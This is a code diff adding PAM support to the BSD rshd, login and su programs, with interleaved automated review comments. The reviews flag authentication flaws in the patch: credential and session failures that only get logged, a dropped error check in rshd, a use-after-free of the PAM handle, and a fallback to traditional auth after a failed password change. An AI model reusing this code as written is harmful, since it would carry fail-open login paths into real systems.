@@ -500,6 +500,8 @@ #endif char *mod_full_path=NULL; servicefn func, func2; + int actions2buf[_PAM_RETURN_VALUES]; + int *actions2 = actions; int success; D(("called.")); @@ -649,6 +651,19 @@ _sym = "_pam_sm_authenticate"; _sym2 = "_pam_sm_setcred"; #endif + actions2 = actions2buf; + /* Always run the pam_sm_setcred for all listed auth modules. + Otherwise, we can end up not running the pam_sm_setcred + for auth module(s) that authenticated successfully, + e.g. if an earlier auth module is "sufficient" and + its authenticate fails but its setcred succeeds. + This is also apparently what Solaris PAM does. */ + { + int i; + for (i = 0; i < _PAM_RETURN_VALUES; i++) + actions2[i] = _PAM_ACTION_IGNORE; + actions2[PAM_SUCCESS] = _PAM_ACTION_OK; + } break; case PAM_T_SESS: handler_p = &the_handlers->open_session; @@ -780,7 +795,7 @@ (*handler_p2)->must_fail = must_fail; /* failure forced? */ (*handler_p2)->func = func2; - memcpy((*handler_p2)->actions,actions,sizeof((*handler_p2)->actions)); + memcpy((*handler_p2)->actions,actions2,sizeof((*handler_p2)->actions)); (*handler_p2)->argc = argc; if (argv) { if (((*handler_p2)->argv = malloc(argvlen)) == NULL) { --- ./libexec/rshd/Makefile 2001/01/17 00:04:57 1.1 +++ ./libexec/rshd/Makefile 2001/01/23 18:03:41 @@ -7,10 +7,15 @@ #CFLAGS+= -DCRYPT -# For login_cap handling -CFLAGS+=-DLOGIN_CAP -Wall +CFLAGS+= -Wall DPADD+= ${LIBUTIL} LDADD+= -lutil + +.if !defined(NOPAM) +CFLAGS+= -DUSE_PAM +DPADD+= ${LIBPAM} +LDADD+= ${MINUSLPAM} +.endif # IPv6 support CFLAGS+= -DINET6 --- ./libexec/rshd/rshd.8 2001/01/23 01:05:26 1.1 +++ ./libexec/rshd/rshd.8 2001/01/23 01:16:21 
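Review bot: in the PAM_T_AUTH hunk of pam_handlers.c, mapping every return code except PAM_SUCCESS to _PAM_ACTION_IGNORE means a pam_sm_setcred() that fails contributes nothing to the result, so pam_setcred() returns PAM_SUCCESS to login/su/rshd whenever any other auth module succeeded, and the callers' "pam_setcred: %s" syslogs in the later hunks will never fire for that module. The comment only needs control flags to be ignored, not failures: keep the error codes mapped to the module's own actions (or at least _PAM_ACTION_BAD) so that a failed credential setup is still reported. Minor: actions2buf is refilled with the same constant table for every auth handler parsed; build it once outside the per-module path.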
@@ -238,6 +238,16 @@ .It Pa Ev $HOME /.rhosts .Sm on .It Pa /var/run/nologin +.It Pa /etc/pam.conf +if +.Nm +is configured with PAM support, it uses +.Pa /etc/pam.conf +entries with service name +.Dq rsh . +authentication modules requiring passwords (such as +.Nm pam_unix ) +are not supported .El .Sh BUGS The authentication procedure used here assumes the integrity --- ./libexec/rshd/rshd.c 2000/11/12 07:00:38 1.1 +++ ./libexec/rshd/rshd.c 2001/01/23 18:01:58 @@ -76,9 +76,21 @@ #include #include #include -#ifdef LOGIN_CAP #include -#endif + +#ifdef USE_PAM +#include +#include +static pam_handle_t *pamh; +#define PAM_END { \ + if ((retcode = pam_setcred(pamh, PAM_DELETE_CRED)) != PAM_SUCCESS) \ + syslog(LOG_ERR|LOG_AUTH, "pam_setcred: %s", pam_strerror(pamh, retcode)); \ + if ((retcode = pam_close_session(pamh,0)) != PAM_SUCCESS) \ + syslog(LOG_ERR|LOG_AUTH, "pam_close_session: %s", pam_strerror(pamh, retcode)); \ + if ((retcode = pam_end(pamh, retcode)) != PAM_SUCCESS) \ + syslog(LOG_ERR|LOG_AUTH, "pam_end: %s", pam_strerror(pamh, retcode)); \ +} +#endif /* USE_PAM */ /* wrapper for KAME-special getnameinfo() */ #ifndef NI_WITHSCOPEID @@ -188,6 +200,20 @@ return(0); } +#ifdef USE_PAM +/* + * We can't have a conversation with the client over the rsh connection. + * You must use auth methods that don't require one, like pam_rhosts. + */ + +int null_conv(int num_msg, const struct pam_message **msg, + struct pam_response **resp, void *appdata_ptr) +{ + syslog(LOG_ERR, "PAM conversation is not supported"); + return PAM_CONV_ERR; +} +#endif /* USE_PAM */ + char username[20] = "USER="; char homedir[64] = "HOME="; char shell[64] = "SHELL="; @@ -216,9 +242,12 @@ int rc; int pv1[2], pv2[2]; #endif -#ifdef LOGIN_CAP login_cap_t *lc; -#endif +#ifdef USE_PAM + static struct pam_conv conv = { null_conv, NULL }; + int retcode, i; + const char * const *env; +#endif /* USE_PAM */ (void) signal(SIGINT, SIG_DFL); (void) signal(SIGQUIT, SIG_DFL); 
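Review bot: in the rshd.8 hunk the new sentence after the .Dq rsh entry starts in lowercase ("authentication modules requiring passwords") and has no terminating period, and .Nm is the wrong macro for pam_unix: .Nm names the manual's own program and would set it to pam_unix on first use. Write the module name as plain text (or .Pa with its path) and capitalise the sentence.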
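Review bot: null_conv() in rshd.c has external linkage; make it static, as the pamh it serves already is. Since every module that tries to converse will fail through it, the LOG_ERR text would be more useful to an administrator if it named the service (for instance "rsh PAM service is configured with a module that prompts; only non-interactive modules such as pam_rhosts are usable here") rather than the generic "PAM conversation is not supported".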
@@ -229,7 +258,7 @@ && af != AF_INET6 #endif ) { - syslog(LOG_ERR, "malformed \"from\" address (af %d)\n", af); + syslog(LOG_ERR, "malformed \"from\" address (af %d)", af); exit(1); } err = getnameinfo((struct sockaddr *)fromp, fromp->su_len, numericname, 
@@ -341,6 +370,56 @@ getstr(locuser, sizeof(locuser), "locuser"); getstr(cmdbuf, sizeof(cmdbuf), "command"); + +#ifdef USE_PAM + retcode = pam_start("rsh", locuser, &conv, &pamh); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR|LOG_AUTH, "pam_start: %s", pam_strerror(pamh, retcode)); + error("Login incorrect.\n"); + exit(1); + } + + retcode = pam_set_item (pamh, PAM_RUSER, remuser); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_RUSER): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + error("Login incorrect.\n"); + exit(1); + } + retcode = pam_set_item (pamh, PAM_RHOST, fromhost); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + error("Login incorrect.\n"); + exit(1); + } + retcode = pam_set_item (pamh, PAM_TTY, "tty"); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + error("Login incorrect.\n"); + exit(1); + } + + retcode = pam_authenticate(pamh, 0); + if (retcode == PAM_SUCCESS) { + if ((retcode = pam_get_item(pamh, PAM_USER, (const void **) &cp)) == PAM_SUCCESS) { + strncpy(locuser, cp, sizeof(locuser)); + locuser[sizeof(locuser) - 1] = '\0'; + } else + syslog(LOG_ERR|LOG_AUTH, "pam_get_item(PAM_USER): %s", + pam_strerror(pamh, retcode)); + retcode = pam_acct_mgmt(pamh, 0); + } + if (retcode != PAM_SUCCESS) { + syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied (%s). cmd='%.80s'", + remuser, fromhost, locuser, pam_strerror(pamh, retcode), cmdbuf); + pam_end(pamh, retcode); + error("Login incorrect.\n"); + exit(1); + } +#endif /* USE_PAM */ + setpwent(); pwd = getpwnam(locuser); if (pwd == NULL) { 
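Review bot: pam_set_item(pamh, PAM_TTY, "tty") gives modules a string that looks like a device name but is not one; rshd has no controlling terminal, so a securetty-style module will compare "tty" against real tty entries and either spuriously deny or, depending on how it matches, spuriously allow. Either leave PAM_TTY unset for rshd or use a value no tty check can match, and say in a comment that it is a placeholder. The rest of the block is sound: locuser is rewritten from PAM_USER with a bounded strncpy and pam_acct_mgmt() is consulted before getpwnam(), so a module that maps the user is honoured.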
@@ -349,13 +428,36 @@ remuser, fromhost, locuser, cmdbuf); if (errorstr == NULL) errorstr = "Login incorrect.\n"; - goto fail; + error(errorstr, fromhost); + exit(1); + } + +#ifndef USE_PAM + if (errorstr || + (pwd->pw_expire && time(NULL) >= pwd->pw_expire) || + iruserok_sa(fromp, fromp->su_len, pwd->pw_uid == 0, + remuser, locuser) < 0) { + if (__rcmd_errstr) + syslog(LOG_INFO|LOG_AUTH, + "%s@%s as %s: permission denied (%s). cmd='%.80s'", + remuser, fromhost, locuser, __rcmd_errstr, + cmdbuf); + else + syslog(LOG_INFO|LOG_AUTH, + "%s@%s as %s: permission denied. cmd='%.80s'", + remuser, fromhost, locuser, cmdbuf); + if (errorstr == NULL) + errorstr = "Login incorrect.\n"; + error(errorstr, fromhost); + exit(1); } -#ifdef LOGIN_CAP +#endif /* USE_PAM */ + lc = login_getpwclass(pwd); -#endif + if (pwd->pw_uid) + auth_checknologin(lc); + if (chdir(pwd->pw_dir) < 0) { -#ifdef LOGIN_CAP if (chdir("/") < 0 || login_getcapbool(lc, "requirehome", !!pwd->pw_uid)) { syslog(LOG_INFO|LOG_AUTH, 
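Review bot: the `if (errorstr || (pwd->pw_expire ...) || iruserok_sa(...) < 0)` test is moved under #ifndef USE_PAM, so in the PAM build an errorstr set earlier in rshd.c (the same string the pwd == NULL branch still reports with error(errorstr, fromhost)) no longer denies the login. PAM only replaces the iruserok_sa() and pw_expire checks, not whatever condition set errorstr before this point; keep an unconditional `if (errorstr) { error(errorstr, fromhost); exit(1); }` outside the #ifndef so that check still fails closed.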
@@ -364,44 +466,9 @@ error("No remote home directory.\n"); exit(0); } -#else - (void) chdir("/"); -#ifdef notdef - syslog(LOG_INFO|LOG_AUTH, - "%s@%s as %s: no home directory. cmd='%.80s'", - remuser, fromhost, locuser, cmdbuf); - error("No remote directory.\n"); - exit(1); -#endif -#endif pwd->pw_dir = "/"; } - if (errorstr || - (pwd->pw_expire && time(NULL) >= pwd->pw_expire) || - iruserok_sa(fromp, fromp->su_len, pwd->pw_uid == 0, - remuser, locuser) < 0) { - if (__rcmd_errstr) - syslog(LOG_INFO|LOG_AUTH, - "%s@%s as %s: permission denied (%s). cmd='%.80s'", - remuser, fromhost, locuser, __rcmd_errstr, - cmdbuf); - else - syslog(LOG_INFO|LOG_AUTH, - "%s@%s as %s: permission denied. cmd='%.80s'", - remuser, fromhost, locuser, cmdbuf); -fail: - if (errorstr == NULL) - errorstr = "Login incorrect.\n"; - error(errorstr, fromhost); - exit(1); - } - - if (pwd->pw_uid && !access(_PATH_NOLOGIN, F_OK)) { - error("Logins currently disabled.\n"); - exit(1); - } -#ifdef LOGIN_CAP if (lc != NULL && fromp->su_family == AF_INET) { /*XXX*/ char remote_ip[MAXHOSTNAMELEN]; @@ -421,13 +488,30 @@ exit(1); } } -#endif /* !LOGIN_CAP */ #if BSD > 43 /* before fork, while we're session leader */ if (setlogin(pwd->pw_name) < 0) syslog(LOG_ERR, "setlogin() failed: %m"); #endif + /* + * PAM modules might add supplementary groups in + * pam_setcred(), so initialize them first. + * But we need to open the session as root. + */ + if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETGROUP) != 0) { + syslog(LOG_ERR, "setusercontext: %m"); + exit(1); + } + +#ifdef USE_PAM + if ((retcode = pam_open_session(pamh, 0)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_open_session: %s", pam_strerror(pamh, retcode)); + } else if ((retcode = pam_setcred(pamh, PAM_ESTABLISH_CRED)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, retcode)); + } +#endif /* USE_PAM */ + (void) write(STDERR_FILENO, "\0", 1); sent_null = 1; 
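Review bot: a failing pam_open_session() or pam_setcred(PAM_ESTABLISH_CRED) is only syslogged and rshd goes on to run the command, so a session module that refuses, or credentials the user's command relies on that could not be established, never stops the login. Treat either failure like the pam_authenticate()/pam_acct_mgmt() failures above: error("Login incorrect.\n") (or a session-specific message), pam_end(), exit(1). The same pattern recurs in the login.c and su.c hunks.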
@@ -451,6 +535,9 @@ pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); +#ifdef USE_PAM + PAM_END; +#endif /* USE_PAM */ exit(1); } if (pid) { @@ -569,6 +656,9 @@ (doencrypt && FD_ISSET(pv1[0], &readfrom)) || #endif FD_ISSET(pv[0], &readfrom)); +#ifdef USE_PAM + PAM_END; +#endif /* USE_PAM */ exit(0); } setpgrp(0, getpid()); @@ -586,6 +676,23 @@ dup2(pv[1], 2); close(pv[1]); } +#ifdef USE_PAM + else { + pid = fork(); + if (pid == -1) { + error("Can't fork; try again.\n"); + PAM_END; + exit(1); + } + if (pid) { + /* Parent. */ + wait(NULL); + PAM_END; + exit(0); + } + } +#endif /* USE_PAM */ + if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; environ = envinit; @@ -598,17 +705,20 @@ cp++; else cp = pwd->pw_shell; -#ifdef LOGIN_CAP - if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETALL) != 0) { + + if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETALL & ~LOGIN_SETGROUP) != 0) { syslog(LOG_ERR, "setusercontext: %m"); exit(1); } login_close(lc); -#else - (void) setgid((gid_t)pwd->pw_gid); - initgroups(pwd->pw_name, pwd->pw_gid); - (void) setuid((uid_t)pwd->pw_uid); -#endif +#ifdef USE_PAM + env = (const char * const *)pam_getenvlist(pamh); + if (env != NULL) { + for (i=0; env[i]; i++) + putenv(env[i]); + } +#endif /* USE_PAM */ + endpwent(); if (log_success || pwd->pw_uid == 0) { syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%.80s'", --- ./usr.bin/login/Makefile 2001/01/21 04:44:21 1.1 +++ ./usr.bin/login/Makefile 2001/01/21 04:44:45 @@ -11,9 +11,8 @@ DPADD= ${LIBUTIL} ${LIBCRYPT} LDADD= -lutil -lcrypt -.if defined(NOPAM) -CFLAGS+= -DNO_PAM -.else +.if !defined(NOPAM) +CFLAGS+= -DUSE_PAM DPADD+= ${LIBPAM} LDADD+= ${MINUSLPAM} .endif --- ./usr.bin/login/login.1 2001/01/23 01:04:52 1.1 +++ ./usr.bin/login/login.1 2001/01/23 01:16:45 
@@ -177,6 +177,13 @@ makes login quieter .It Pa /etc/auth.conf configure authentication services +.It Pa /etc/pam.conf +if +.Nm +is configured with PAM support, it uses +.Pa /etc/pam.conf +entries with service name +.Dq login .El .Sh SEE ALSO .Xr builtin 1 , --- ./usr.bin/login/login.c 2000/08/08 03:12:59 1.1 +++ ./usr.bin/login/login.c 2001/01/23 00:53:51 @@ -78,10 +78,11 @@ #include #include -#ifndef NO_PAM +#ifdef USE_PAM #include #include -#endif +#include +#endif /* USE_PAM */ #include "pathnames.h" @@ -104,9 +105,18 @@ int login_access __P((char *, char *)); void login_fbtab __P((char *, uid_t, gid_t)); -#ifndef NO_PAM +#ifdef USE_PAM static int auth_pam __P((void)); -#endif +pam_handle_t *pamh = NULL; +#define PAM_END { \ + if ((e = pam_setcred(pamh, PAM_DELETE_CRED)) != PAM_SUCCESS) \ + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, e)); \ + if ((e = pam_close_session(pamh,0)) != PAM_SUCCESS) \ + syslog(LOG_ERR, "pam_close_session: %s", pam_strerror(pamh, e)); \ + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) \ + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); \ +} +#endif /* USE_PAM */ static int auth_traditional __P((void)); extern void login __P((struct utmp *)); static void usage __P((void)); @@ -150,6 +160,10 @@ char tname[sizeof(_PATH_TTY) + 10]; char *shell = NULL; login_cap_t *lc = NULL; +#ifdef USE_PAM + pid_t pid; + int e; +#endif /* USE_PAM */ (void)signal(SIGQUIT, SIG_IGN); (void)signal(SIGINT, SIG_IGN); 
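Review bot: pamh in login.c is now a file-scope variable with external linkage (`pam_handle_t *pamh = NULL;`); make it static, since auth_pam() is static and nothing outside login.c refers to it. The PAM_END macro also silently depends on a local named `e` being in scope; take the status variable as a macro parameter (PAM_END(e)) so a caller without one fails at compile time instead of picking up an unrelated `e`.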
@@ -309,19 +323,19 @@ (void)setpriority(PRIO_PROCESS, 0, -4); -#ifndef NO_PAM +#ifdef USE_PAM /* * Try to authenticate using PAM. If a PAM system error * occurs, perhaps because of a botched configuration, * then fall back to using traditional Unix authentication. */ if ((rval = auth_pam()) == -1) -#endif /* NO_PAM */ +#endif /* USE_PAM */ rval = auth_traditional(); (void)setpriority(PRIO_PROCESS, 0, 0); -#ifndef NO_PAM +#ifdef USE_PAM /* * PAM authentication may have changed "pwd" to the * entry for the template user. Check again to see if @@ -329,7 +343,7 @@ */ if (pwd != NULL && pwd->pw_uid == 0) rootlogin = 1; -#endif /* NO_PAM */ +#endif /* USE_PAM */ ttycheck: /* @@ -549,6 +563,43 @@ environ = envinit; /* + * PAM modules might add supplementary groups during pam_setcred(). + */ + if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETGROUP) != 0) { + syslog(LOG_ERR, "setusercontext() failed - exiting"); + exit(1); + } + +#ifdef USE_PAM + if (pamh) { + if ((e = pam_open_session(pamh, 0)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_open_session: %s", pam_strerror(pamh, e)); + } else if ((e = pam_setcred(pamh, PAM_ESTABLISH_CRED)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, e)); + } + + /* + * We must fork() before setuid() because we need to call + * pam_close_session() as root. + */ + pid = fork(); + if (pid < 0) { + err(1, "fork"); + PAM_END; + exit(0); + } else if (pid) { + /* parent - wait for child to finish, then cleanup session */ + wait(NULL); + PAM_END; + exit(0); + } else { + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); + } + } +#endif /* USE_PAM */ + + /* * We don't need to be root anymore, so * set the user and session context */ @@ -557,7 +608,7 @@ exit(1); } if (setusercontext(lc, pwd, pwd->pw_uid, - LOGIN_SETALL & ~LOGIN_SETLOGIN) != 0) { + LOGIN_SETALL & ~(LOGIN_SETLOGIN|LOGIN_SETGROUP)) != 0) { syslog(LOG_ERR, "setusercontext() failed - exiting"); exit(1); } 
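Review bot: in the fork() failure branch of the login.c session hunk, err(1, "fork") exits before PAM_END and the following exit(0) run, so a login that fails to fork leaves the session open and credentials established; run PAM_END first and delete the dead exit(0). Two further points in the same hunk: the parent's single wait(NULL) returns -1 on EINTR, after which PAM_END closes the session while the child shell is still running, so loop until the child's pid is returned; and, as in rshd, pam_open_session()/pam_setcred() failures are only logged and the login continues, which should fail closed.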
@@ -573,6 +624,17 @@ (void)setenv("USER", username, 1); (void)setenv("PATH", rootlogin ? _PATH_STDPATH : _PATH_DEFPATH, 0); +#ifdef USE_PAM + if (pamh) { + const char * const *env = (const char * const *)pam_getenvlist(pamh); + int i; + if (env != NULL) { + for (i=0; env[i]; i++) + putenv(env[i]); + } + } +#endif /* USE_PAM */ + if (!quietlog) { char *cw; @@ -652,7 +714,7 @@ return rval; } -#ifndef NO_PAM +#ifdef USE_PAM /* * Attempt to authenticate the user using PAM. Returns 0 if the user is * authenticated, or 1 if not authenticated. If some sort of PAM system @@ -663,7 +725,6 @@ static int auth_pam() { - pam_handle_t *pamh = NULL; const char *tmpl_user; const void *item; int rval; @@ -677,12 +738,14 @@ if ((e = pam_set_item(pamh, PAM_TTY, tty)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, e)); + pam_end(pamh, e); return -1; } if (hostname != NULL && (e = pam_set_item(pamh, PAM_RHOST, full_hostname)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, e)); + pam_end(pamh, e); return -1; } e = pam_authenticate(pamh, 0); @@ -712,8 +775,8 @@ if (strcmp(username, tmpl_user) != 0) pwd = getpwnam(tmpl_user); } else - syslog(LOG_ERR, "Couldn't get PAM_USER: %s", - pam_strerror(pamh, e)); + syslog(LOG_ERR, "pam_get_item(PAM_USER): %s", + pam_strerror(pamh, e)); rval = 0; break; 
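Review bot: the two pam_end() calls added to the pam_set_item() error paths in auth_pam() free the handle but leave the now-global pamh pointing at it, and return -1 makes main() fall back to auth_traditional(); if that succeeds, main() reaches `if (pamh)` and calls pam_open_session() on freed memory. Set pamh = NULL after each of these pam_end() calls, or jump to the `rval == -1` cleanup at the end of the function, which already resets it.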
@@ -724,17 +787,33 @@ break; default: - syslog(LOG_ERR, "auth_pam: %s", pam_strerror(pamh, e)); + syslog(LOG_ERR, "pam_authenticate: %s", pam_strerror(pamh, e)); rval = -1; break; } - if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { - syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); - rval = -1; + + if (rval != -1) { + e = pam_acct_mgmt(pamh, 0); + if (e == PAM_NEW_AUTHTOK_REQD) { + e = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); + if (e != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, e)); + rval = -1; + } + } else if (e != PAM_SUCCESS) { + rval = 1; + } + } + + if (rval == -1) { + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); + } + pamh = NULL; } return rval; } -#endif /* NO_PAM */ +#endif /* USE_PAM */ static void usage() @@ -745,7 +824,7 @@ /* * Allow for authentication style and/or kerberos instance - * */ + */ #define NBUFSIZ UT_NAMESIZE + 64 --- ./usr.bin/su/Makefile 2001/01/16 21:33:47 1.1 +++ ./usr.bin/su/Makefile 2001/01/23 18:07:48 @@ -4,9 +4,18 @@ PROG= su SRCS= su.c -COPTS+= -DLOGIN_CAP -DSKEY -DPADD= ${LIBUTIL} ${LIBSKEY} ${LIBMD} ${LIBCRYPT} -LDADD= -lutil -lskey -lmd -lcrypt +DPADD+= ${LIBUTIL} +LDADD+= -lutil + +.if !defined(NOPAM) +CFLAGS+= -DUSE_PAM +DPADD+= ${LIBPAM} +LDADD+= ${MINUSLPAM} +.else +COPTS+= -DSKEY +DPADD+= ${LIBSKEY} ${LIBMD} ${LIBCRYPT} +LDADD+= -lskey -lmd -lcrypt +.endif .if defined(WHEELSU) COPTS+= -DWHEELSU --- ./usr.bin/su/su.1 2001/01/23 01:02:52 1.1 +++ ./usr.bin/su/su.1 2001/01/23 01:16:33 @@ -173,6 +173,13 @@ .Bl -tag -width /etc/auth.conf -compact .It Pa /etc/auth.conf configure authentication services +.It Pa /etc/pam.conf +if +.Nm +is configured with PAM support, it uses +.Pa /etc/pam.conf +entries with service name +.Dq su .El .Sh SEE ALSO .Xr csh 1 , --- ./usr.bin/su/su.c 2000/02/24 21:06:21 1.1 +++ ./usr.bin/su/su.c 2001/01/23 18:05:14 
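Review bot: when pam_chauthtok(PAM_CHANGE_EXPIRED_AUTHTOK) fails, rval is set to -1, which main() interprets as a PAM system error and answers by calling auth_traditional(), so a user who cannot or will not change an expired password gets a second try through the non-PAM path. Return 1 (not authenticated) instead. On the rval == 1 paths (the pam_acct_mgmt() denial and the existing not-authenticated cases) the handle is also left open, since only rval == -1 reaches pam_end() here and main() only cleans up via PAM_END after a successful login; end it, and set pamh = NULL, whenever rval != 0.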
@@ -60,36 +60,40 @@ #include #include #include - -#ifdef LOGIN_CAP #include -#endif +#ifdef USE_PAM +#include +#include +#include +#include +#define PAM_END { \ + if ((retcode = pam_setcred(pamh, PAM_DELETE_CRED)) != PAM_SUCCESS) { \ + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, retcode)); \ + } \ + if ((retcode = pam_end(pamh,retcode)) != PAM_SUCCESS) { \ + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, retcode)); \ + } \ +} +#else /* !USE_PAM */ #ifdef SKEY #include #endif +#endif /* USE_PAM */ #ifdef KERBEROS #include #include #include -#ifdef LOGIN_CAP #define ARGSTR "-Kflmc:" -#else -#define ARGSTR "-Kflm" -#endif static int kerberos(char *username, char *user, int uid, char *pword); static int koktologin(char *name, char *toname); int use_kerberos = 1; #else /* !KERBEROS */ -#ifdef LOGIN_CAP #define ARGSTR "-flmc:" -#else -#define ARGSTR "-flm" -#endif #endif /* KERBEROS */ char *ontty __P((void)); @@ -107,17 +111,26 @@ char *targetpass; int iswheelsu; #endif /* WHEELSU */ - char *p, **g, *user, *shell=NULL, *username, **cleanenv, **nargv, **np; - struct group *gr; + char *p, *user, *shell=NULL, *username, *cleanenv = NULL, **nargv, **np; uid_t ruid; gid_t gid; int asme, ch, asthem, fastlogin, prio, i; enum { UNSET, YES, NO } iscsh = UNSET; -#ifdef LOGIN_CAP login_cap_t *lc; char *class=NULL; int setwhat; -#endif +#ifdef USE_PAM + int retcode; + pam_handle_t *pamh = NULL; + struct pam_conv conv = { misc_conv, NULL }; + char myhost[MAXHOSTNAMELEN + 1], *mytty; + int statusp=0; + int child_pid, child_pgrp, ret_pid; + const char * const *env; +#else /* !USE_PAM */ + char **g; + struct group *gr; +#endif /* USE_PAM */ #ifdef KERBEROS char *k; #endif @@ -147,11 +160,9 @@ asme = 1; asthem = 0; break; -#ifdef LOGIN_CAP case 'c': class = optarg; break; -#endif case '?': default: usage(); 
@@ -161,8 +172,7 @@ user = argv[optind++]; if (strlen(user) > MAXLOGNAME - 1) { - (void)fprintf(stderr, "su: username too long.\n"); - exit(1); + errx(1, "username too long"); } if (user == NULL) @@ -189,7 +199,7 @@ if (errno) prio = 0; (void)setpriority(PRIO_PROCESS, 0, -2); - openlog("su", LOG_CONS, 0); + openlog("su", LOG_CONS, LOG_AUTH); /* get current login name and shell */ ruid = getuid(); 
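Review bot: openlog("su", LOG_CONS, LOG_AUTH) now supplies the facility, and the later su.c hunks drop the explicit LOG_AUTH from the LOG_NOTICE calls accordingly, but the "BAD SU" and "account expired" syslog() calls in the next hunk keep LOG_AUTH|LOG_WARNING; drop the redundant facility there too so all su logging is handled the same way.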
@@ -214,11 +224,67 @@ } } +#ifdef USE_PAM + retcode = pam_start("su", user, &conv, &pamh); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_start: %s", pam_strerror(pamh, retcode)); + errx(1, "pam_start: %s", pam_strerror(pamh, retcode)); + } + + gethostname(myhost, sizeof(myhost)); + retcode = pam_set_item(pamh, PAM_RHOST, myhost); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); + } + + mytty = ttyname(STDERR_FILENO); + if (!mytty) + mytty = "tty"; + retcode = pam_set_item(pamh, PAM_TTY, mytty); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); + } + + if (ruid) { + retcode = pam_authenticate(pamh, 0); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_authenticate: %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "Sorry"); + } + + if ((retcode = pam_get_item(pamh, PAM_USER, (const void **) &p)) == PAM_SUCCESS) { + user = p; + } else + syslog(LOG_ERR, "pam_get_item(PAM_USER): %s", + pam_strerror(pamh, retcode)); + + retcode = pam_acct_mgmt(pamh, 0); + if (retcode == PAM_NEW_AUTHTOK_REQD) { + retcode = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "Sorry"); + } + } + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_acct_mgmt: %s", pam_strerror(pamh, retcode)); + pam_end(pamh, retcode); + errx(1, "Sorry"); + } + } + +#endif /* USE_PAM */ + /* get target login information, default to root */ if ((pwd = getpwnam(user)) == NULL) { errx(1, "unknown login: %s", user); } -#ifdef LOGIN_CAP if (class==NULL) { lc = login_getpwclass(pwd); } else { 
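Review bot: pam_set_item(PAM_RHOST, myhost) labels a local su as a request from a remote host, the very distinction PAM_RHOST exists to make; for a local session leave it unset (PAM_TTY already identifies the terminal) and set PAM_RUSER to username instead, which is available and lets modules log or restrict who is su'ing. Note also that for ruid == 0 both pam_authenticate() and pam_acct_mgmt() are skipped, so /etc/pam.conf can no longer refuse root su'ing to a locked or expired account; if that is the intended root exemption, say so in su.1.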
@@ -228,8 +294,8 @@ if (lc == NULL) errx(1, "unknown class: %s", class); } -#endif +#ifndef USE_PAM #ifdef WHEELSU targetpass = strdup(pwd->pw_passwd); #endif /* WHEELSU */ @@ -280,18 +346,18 @@ #ifdef WHEELSU || (iswheelsu && !strcmp(targetpass, crypt(p,targetpass))) #endif /* WHEELSU */ - )) { -#else + )) +#else /* !SKEY */ p = getpass("Password:"); - if (strcmp(pwd->pw_passwd, crypt(p, pwd->pw_passwd))) { -#endif + if (strcmp(pwd->pw_passwd, crypt(p, pwd->pw_passwd))) +#endif /* SKEY */ + { #ifdef KERBEROS if (!use_kerberos || (use_kerberos && kerberos(username, user, pwd->pw_uid, p))) #endif - { - fprintf(stderr, "Sorry\n"); + { syslog(LOG_AUTH|LOG_WARNING, "BAD SU %s to %s%s", username, user, ontty()); - exit(1); + errx(1, "Sorry"); } } #ifdef WHEELSU @@ -301,17 +367,17 @@ #endif /* WHEELSU */ } if (pwd->pw_expire && time(NULL) >= pwd->pw_expire) { - fprintf(stderr, "Sorry - account expired\n"); syslog(LOG_AUTH|LOG_WARNING, "BAD SU %s to %s%s", username, user, ontty()); - exit(1); + errx(1, "Sorry - account expired"); } } +#endif /* USE_PAM */ if (asme) { /* if asme 